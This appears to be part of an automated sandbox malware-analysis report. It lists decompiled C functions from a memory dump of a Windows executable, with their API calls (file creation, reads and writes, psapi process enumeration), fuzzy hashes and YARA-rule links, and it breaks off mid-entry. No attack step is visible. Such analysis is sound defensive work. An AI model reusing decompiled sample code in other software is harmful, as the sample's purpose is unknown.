Instruction ID: f9449c32f6c0a510c9187a937022f757e046aad29a301ac44eac800f026f52ab
Opcode Fuzzy Hash: 824bb1f14422cc71d1a3dffc559b1a5fb77c784d9cd166a2f2aef982484e0c7b
Instruction Fuzzy Hash: F2E01776100100FFE6619B09DC05F6BBBB9EBD4710F14C83EB6D5A61B4C6726952CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004096FE, Relevance: 3.1, APIs: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004096FE(intOrPtr* __eax, void* __edx, void* __eflags, short* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t34;
				void* _t42;
				void* _t44;
				void* _t51;
				signed int _t54;
				intOrPtr* _t58;
				void* _t62;

				_t62 = __eflags;
				_t51 = __edx;
				_push(_t44);
				_push(_t44);
				_t54 = 0;
				_t58 = __eax;
				_v8 = 0;
				E0040951A(__eax, _a8);
				E00407A66(_t58, _t62);
				_t23 = _a4;
				if( *_a4 == 0) {
					_t24 = GetStdHandle(0xfffffff5);
				} else {
					_t24 = E00405351(_t23);
					_pop(_t44);
				}
				_t42 = _t24;
				if(_t42 == 0xffffffff) {
					__eflags = 0;
					E004053B1(0, 0, _t54);
				} else {
					if( *((intOrPtr*)(_t58 + 0x24)) != _t54) {
						if( *((intOrPtr*)(_t58 + 0x28)) == _t54) {
							_push(2);
							_push(0x40ff4c);
						} else {
							_push(3);
							_push(0x40ff48);
						}
						_push(_t42); // executed
						E00405E62(_t44); // executed
					}
					_v8 = 1;
					E0040528C();
					E00409C22(_t58, _t51, _t42, _a8); // executed
					if( *((intOrPtr*)(_t58 + 0x3c)) > _t54) {
						do {
							_t34 = E00407588(_t58, _t54);
							_push(_t34);
							_v12 = _t34;
							if( *((intOrPtr*)( *_t58 + 0x30))() == 0) {
								goto L12;
							} else {
								_push(_a8);
								_push(_v12);
								_push(_t42); // executed
								if( *((intOrPtr*)( *_t58 + 0x84))() == 0) {
									_v8 = _v8 & 0x00000000;
									__eflags = 0;
									E004053B1(0, 0, 0);
								} else {
									goto L12;
								}
							}
							goto L15;
							L12:
							_t54 = _t54 + 1;
						} while (_t54 <  *((intOrPtr*)(_t58 + 0x3c)));
					}
					L15:
					E00409BE4(_a8, _t58, _t42);
					if( *_a4 != 0) {
						FindCloseChangeNotification(_t42); // executed
					}
					E004052A6();
				}
				return _v8;
			}

0x004096fe
0x004096fe
0x00409701
0x00409702
0x00409709
0x0040970b
0x0040970d
0x00409710
0x00409717
0x0040971c
0x00409722
0x0040972f
0x00409724
0x00409725
0x0040972a
0x0040972a
0x00409735
0x0040973a
0x004097e0
0x004097e2
0x00409740
0x00409743
0x00409748
0x00409753
0x00409755
0x0040974a
0x0040974a
0x0040974c
0x0040974c
0x0040975a
0x0040975b
0x00409760
0x00409763
0x0040976a
0x00409775
0x0040977d
0x0040977f
0x00409780
0x00409787
0x0040978a
0x00409792
0x00000000
0x00409794
0x00409794
0x00409799
0x0040979e
0x004097a7
0x004097b1
0x004097b7
0x004097b9
0x00000000
0x00000000
0x00000000
0x004097a7
0x00000000
0x004097a9
0x004097a9
0x004097aa
0x004097af
0x004097bf
0x004097c3
0x004097cf
0x004097d2
0x004097d2
0x004097d8
0x004097d8
0x004097ef

APIs

Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E

GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000002,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 0040972F
FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000000,?,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004097D2

Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004053C5
Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59

Uniqueness

Uniqueness Score: -1.00%

Function 00404689, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				void* _t28;
				void** _t29;
				void* _t34;
				intOrPtr _t37;
				void* _t38;

				_t30 = __ecx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t29 = __ecx;
				_v8 = 0x1388;
				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
				_t34 = _v16;
				if(E00404070(_t29, _t34, _a4) == 0) {
					_t37 = 0;
				} else {
					_t38 = _a8;
					if( *(_t34 + 0x24) != 1) {
						L6:
						__eflags =  *(_t34 + 0x24) & 0x00000004;
						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
							goto L4;
						} else {
							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
							_t37 = _a4;
						}
					} else {
						_t28 = E0040460C(_t30, _t29, _t34, _t38);
						_t44 = _t28;
						if(_t28 == 0) {
							goto L6;
						} else {
							_t25 = E00404689(_t29, _t44, _t28, _t38);
							L4:
							_t37 = _t25;
						}
					}
				}
				E00406710( &_v16);
				return _t37;
			}

0x00404689
0x0040468f
0x00404693
0x00404699
0x004046ab
0x004046b2
0x004046ba
0x004046c7
0x00404725
0x004046c9
0x004046cd
0x004046d0
0x004046fa
0x004046fa
0x004046fe
0x0040471e
0x00000000
0x00404700
0x0040470e
0x00404713
0x00404716
0x004046d2
0x004046d5
0x004046da
0x004046dc
0x00000000
0x004046de
0x004046e2
0x004046e7
0x004046e7
0x004046e7
0x004046dc
0x004046d0
0x004046ec
0x004046f7

APIs

Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E

Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C

memcpy.MSVCRT ref: 0040470E

Strings

F@@, xrefs: 00404697, 004046D4, 0040471D

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@FilePointermemcpy
String ID: F@@
API String ID: 402491248-234039029
Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040536A, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040536A(void* _a4, void* _a8) {
				long _v8;
				int _t8;

				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
				return _t8;
			}

0x00405386
0x0040538d

APIs

wcslen.MSVCRT ref: 00405377
WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritewcslen
String ID:
API String ID: 3657313286-0
Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64

Uniqueness

Uniqueness Score: -1.00%

Function 00406729, Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406729(signed int __edi, signed int* __esi) {
				signed int _t4;
				signed int _t9;
				signed int* _t10;

				_t10 = __esi;
				_t9 = __edi;
				_t4 =  *__esi;
				if(_t4 != 0) {
					_push(_t4);
					L0040E032();
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
				}
				_push(_t9); // executed
				L0040E038(); // executed
				 *_t10 = _t4;
				_t10[1] = _t9;
				return 1;
			}

0x00406729
0x00406729
0x00406729
0x0040672d
0x0040672f
0x00406730
0x00406735
0x00406738
0x0040673c
0x0040673d
0x0040673e
0x00406743
0x00406748
0x0040674c

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406730
??2@YAPAXI@Z.MSVCRT ref: 0040673E

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 6cf18488331c8de55bf8df2c2b0666198ccd521b8632149474be28f73699e0b4
Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
Opcode Fuzzy Hash: 6cf18488331c8de55bf8df2c2b0666198ccd521b8632149474be28f73699e0b4
Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040623E, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040623E(intOrPtr* __esi) {

				free( *(__esi + 0x10)); // executed
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x00406241
0x00406249
0x00406252
0x00406254
0x00406257
0x0040625a
0x0040625d
0x00406260
0x00406263

APIs

free.MSVCRT(?,004064D9,74784E00,?,00000000), ref: 00406241
free.MSVCRT(?,?,004064D9,74784E00,?,00000000), ref: 00406249

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04

Uniqueness

Uniqueness Score: -1.00%

Function 0040D68E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5

Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040D049, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E0040D071(__eax);
				_t1 = _t10 + 0x14; // 0x8d000001
				_t6 =  *_t1;
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x0040d04a
0x0040d04c
0x0040d051
0x0040d051
0x0040d057
0x00000000
0x0040d06c
0x0040d068
0x00000000

APIs

Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,747859F0,0040CF75,?,?), ref: 0040D07C
Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileLibraryLoadModuleName
String ID:
API String ID: 3821362017-0
Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A

Uniqueness

Uniqueness Score: -1.00%

Function 00405E43, Relevance: 1.5, APIs: 1, Instructions: 13
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}

0x00405e47
0x00405e5a
0x00405e61

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405E62, Relevance: 1.5, APIs: 1, Instructions: 13
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}

0x00405e66
0x00405e79
0x00405e80

APIs

WriteFile.KERNELBASE(?,?,74784E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
Instruction ID: e108cc57461cd09051f83d149da4ae7cbb94a9151abf142b08e99a69ba8f508e
Opcode Fuzzy Hash: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
Instruction Fuzzy Hash: 9DD0C93101020DFBDF01CF80DD06FDD7B7DEB04359F104064BA00A5060C7B59A14AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00406710, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406710(signed int* __ecx) {
				signed int _t3;

				_t3 =  *__ecx;
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
					 *__ecx =  *__ecx & 0x00000000;
					__ecx[1] = __ecx[1] & 0x00000000;
					return _t3;
				}
				return _t3;
			}

0x00406713
0x00406717
0x00406719
0x0040671a
0x0040671f
0x00406722
0x00000000
0x00406726
0x00406728

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040671A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 4f958886a1fed562ce50c28080d2c7fd2b1c6c9b145344d0f8520b1a11cb79c8
Instruction ID: 5339db72a64abfad3c15032fde593e64a1d815d69f9877ad78659c6e85a1ca85
Opcode Fuzzy Hash: 4f958886a1fed562ce50c28080d2c7fd2b1c6c9b145344d0f8520b1a11cb79c8
Instruction Fuzzy Hash: 13C012B28282214BE7345A29E80076262D89F14366F22082EE480A31C0DAB89C808658

Uniqueness

Uniqueness Score: -1.00%

Function 00405351, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405351(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}

0x00405363
0x00405369

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
Instruction ID: 1e51560ea2d226d7cbdf2b9922d616c5fe3e6071316244dee5f443afb53d0edf
Opcode Fuzzy Hash: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
Instruction Fuzzy Hash: B1C092B0290200BEFE204A10AD0AF77355EE780700F1084307A00E80E1C2A14C058524

Uniqueness

Uniqueness Score: -1.00%

Function 00405338, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405338(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				return _t3;
			}

0x0040534a
0x00405350

APIs

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
Instruction ID: d588f5942abdbf62074f27fc8161704726317c11aca05e571d26f2c48b98c5da
Opcode Fuzzy Hash: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
Instruction Fuzzy Hash: B3C092B0280200BEFE224A10FD16F36355DE780700F2044347E00F80E0C1604E158524

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA82, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
				return 1;
			}

0x0040da91
0x0040da9a

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
Instruction ID: 51e3a4b42ca36b746c75c5eb4a2aee4057f89303c93404922418ae0f581905ac
Opcode Fuzzy Hash: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
Instruction Fuzzy Hash: F5C09B3356438197C7119F508C09F1B7A95BB54705F504C397151A40E1C7714018A605

Uniqueness

Uniqueness Score: -1.00%

Function 0040405E, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040405E(void** __esi) {
				void* _t1;
				signed int* _t2;

				_t2 = __esi;
				_t1 =  *__esi;
				if(_t1 != 0xffffffff) {
					_t1 = FindCloseChangeNotification(_t1); // executed
				}
				 *_t2 =  *_t2 | 0xffffffff;
				return _t1;
			}

0x0040405e
0x0040405e
0x00404063
0x00404066
0x00404066
0x0040406c
0x0040406f

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14

Uniqueness

Uniqueness Score: -1.00%

Function 004057D1, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057D1(WCHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x004057d5
0x004057e5

APIs

GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
